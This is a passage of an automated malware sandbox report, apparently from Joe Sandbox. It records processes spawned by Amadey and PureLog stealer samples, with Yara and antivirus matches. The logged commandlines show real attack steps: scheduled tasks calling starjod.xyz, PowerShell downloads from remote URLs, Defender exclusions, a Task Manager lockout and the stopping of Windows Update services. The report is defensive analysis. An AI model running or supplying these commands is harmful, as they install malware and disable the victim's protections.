Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000009.00000000.2162518369.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000009.00000002.2177727699.00000000000D1000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 96%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	18:10:13
Start date:	23/06/2024
Path:	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"
Imagebase:	0xb90000
File size:	424'960 bytes
MD5 hash:	07101CAC5B9477BA636CD8CA7B9932CB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000B.00000000.2176704123.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000B.00000002.4489420216.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe, Author: Joe Security
Antivirus matches:	Detection: 96%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	18:10:14
Start date:	23/06/2024
Path:	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
Imagebase:	0xb90000
File size:	424'960 bytes
MD5 hash:	07101CAC5B9477BA636CD8CA7B9932CB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000C.00000000.2181187117.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000C.00000002.2191932184.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	18:10:16
Start date:	23/06/2024
Path:	C:\Users\user\AppData\Local\Temp\1000091001\Installer.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1000091001\Installer.exe"
Imagebase:	0x7ff6acaf0000
File size:	158'208 bytes
MD5 hash:	5F331887BEC34F51CCA7EA78815621F7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 42%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	18:10:16
Start date:	23/06/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c ins.bat
Imagebase:	0x7ff647100000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	18:10:16
Start date:	23/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6068e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	18:10:16
Start date:	23/06/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"
Imagebase:	0x7ff7b7530000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	18:10:16
Start date:	23/06/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"
Imagebase:	0x7ff7b7530000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	18:10:16
Start date:	23/06/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null"
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	18:10:18
Start date:	23/06/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" http://starjod.xyz/Website.php
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	18:10:18
Start date:	23/06/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" http://starjod.xyz/Website.php
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	18:10:18
Start date:	23/06/2024
Path:	C:\Users\user\AppData\Local\Temp\1000092001\legs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000092001\legs.exe"
Imagebase:	0xcc0000
File size:	675'368 bytes
MD5 hash:	BBD06263062B2C536B5CAACDD5F81B76
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000015.00000002.2422340498.0000000000CF5000.00000004.00000001.01000000.00000011.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 100%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	18:10:19
Start date:	23/06/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x410000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	18:10:19
Start date:	23/06/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xe00000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000017.00000002.2253029783.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	18:10:19
Start date:	23/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	18:10:19
Start date:	23/06/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	18:10:19
Start date:	23/06/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3136 -ip 3136
Imagebase:	0xdb0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	18:10:19
Start date:	23/06/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3136 -s 264
Imagebase:	0xdb0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	18:10:20
Start date:	23/06/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	18:10:21
Start date:	23/06/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	18:10:22
Start date:	23/06/2024
Path:	C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe"
Imagebase:	0x7ff679090000
File size:	2'665'984 bytes
MD5 hash:	FFADA57F998ED6A72B6BA2F072D2690A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 82%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	18:10:23
Start date:	23/06/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	18:10:23
Start date:	23/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	18:10:24
Start date:	23/06/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\install.bat' -Verb runAs -WindowStyle Hidden"
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	18:10:25
Start date:	23/06/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=1844,i,8972611737897508834,4615011947215389574,262144 /prefetch:8
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	18:10:27
Start date:	23/06/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=1976,i,13008057161343220157,61792312660998642,262144 /prefetch:8
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	18:10:25
Start date:	23/06/2024
Path:	C:\Users\user\AppData\Local\Temp\1000094001\taskweaker.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1000094001\taskweaker.exe"
Imagebase:	0x7ff636630000
File size:	6'098'432 bytes
MD5 hash:	6C149B39619395A8BA117A4CAE95BA6F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Go lang
Yara matches:	Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000024.00000003.2381126293.000000C000B58000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000024.00000003.2493890877.000000C000B58000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000024.00000003.2443773184.000000C000B58000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 62%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	18:10:26
Start date:	23/06/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\install.bat"
Imagebase:	0x7ff647100000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	18:10:26
Start date:	23/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	18:10:26
Start date:	23/06/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks /create /tn "Cleaner" /tr "C:\Users\user\AppData\Local\Corporation\File\RemoteExecuteScriptSilent.exe" /sc onstart /delay 0005:00
Imagebase:	0x7ff7b7530000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	18:10:26
Start date:	23/06/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command "Invoke-WebRequest -Uri 'https://github.com/frielandrews892/File/releases/download/File/File.zip' -OutFile 'C:\Users\user\AppData\Local\Corporation.zip'"
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	18:10:26
Start date:	23/06/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableTaskMgr /t REG_DWORD /d 00000001
Imagebase:	0x7ff780780000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	18:10:26
Start date:	23/06/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Imagebase:	0x7ff7e52b0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	43
Start time:	18:10:26
Start date:	23/06/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F
Imagebase:	0x7ff7b7530000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	18:10:27
Start date:	23/06/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6ef0c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	18:10:27
Start date:	23/06/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F
Imagebase:	0x7ff7b7530000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	18:10:27
Start date:	23/06/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff647100000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	18:10:27
Start date:	23/06/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop UsoSvc
Imagebase:	0x7ff750c90000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	18:10:27
Start date:	23/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	18:10:27
Start date:	23/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	18:10:28
Start date:	23/06/2024
Path:	C:\Windows\System32\wusa.exe
Wow64 process (32bit):	false
Commandline:	wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff6a3d20000
File size:	345'088 bytes
MD5 hash:	FBDA2B8987895780375FE0E6254F6198
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	18:10:28
Start date:	23/06/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop WaaSMedicSvc
Imagebase:	0x7ff750c90000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	18:10:28
Start date:	23/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	18:10:28
Start date:	23/06/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop wuauserv
Imagebase:	0x7ff750c90000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	18:10:28
Start date:	23/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	18:10:28
Start date:	23/06/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop bits
Imagebase:	0x7ff750c90000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	18:10:28
Start date:	23/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	18:10:28
Start date:	23/06/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\sc.exe stop dosvc
Imagebase:	0x7ff750c90000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	18:10:28
Start date:	23/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	18:10:28
Start date:	23/06/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Imagebase:	0x7ff7d66c0000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	18:10:28
Start date:	23/06/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Imagebase:	0x7ff7d66c0000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	61
Start time:	18:10:28
Start date:	23/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 054102EF Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2057492601.0000000005410000.00000040.00001000.00020000.00000000.sdmp, Offset: 05410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5410000_hsRju5CPK2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d229e0b3dcbf7c80fd853410b468a186faf84f3a3be8643a4fd312c8e2d794fb
Instruction ID: ab2547226c0ccd2e01c24a487c09984de6ada868e94783649c73ac3da32abee2
Opcode Fuzzy Hash: d229e0b3dcbf7c80fd853410b468a186faf84f3a3be8643a4fd312c8e2d794fb
Instruction Fuzzy Hash: 53216DBB14C128BF6142D4826B58AF66A2FE1D7730331C527FC0FD6602D2954ADB217A

Function 054102FB Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2057492601.0000000005410000.00000040.00001000.00020000.00000000.sdmp, Offset: 05410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5410000_hsRju5CPK2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecb5d36eaf8de722c36e045235d9eb277159226334d3eba55fdb15aa1412ae79
Instruction ID: e05dff0559f49445d5b5056868ca8b419c13d5470df9e9982e6cc91bd42c487d
Opcode Fuzzy Hash: ecb5d36eaf8de722c36e045235d9eb277159226334d3eba55fdb15aa1412ae79
Instruction Fuzzy Hash: 5D2181BB14C218BF7142D4826B58AF6662FE1D77703318527FC0BDA602E2854ECB2179

Function 05410342 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2057492601.0000000005410000.00000040.00001000.00020000.00000000.sdmp, Offset: 05410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5410000_hsRju5CPK2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e6d3f77b4d19e4523e521de055796e45cc646a30b26a809d11f5deb4d7eee73
Instruction ID: 256b89fdd764b08ea814832677d6011b2fe4a99c45883f7d8865171271b8f25b
Opcode Fuzzy Hash: 8e6d3f77b4d19e4523e521de055796e45cc646a30b26a809d11f5deb4d7eee73
Instruction Fuzzy Hash: 3921E5B714C258BFA242D5952B5C9FA6B2FE1D73303348567FC0AC5102D2854ACB2239

Function 0541030B Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

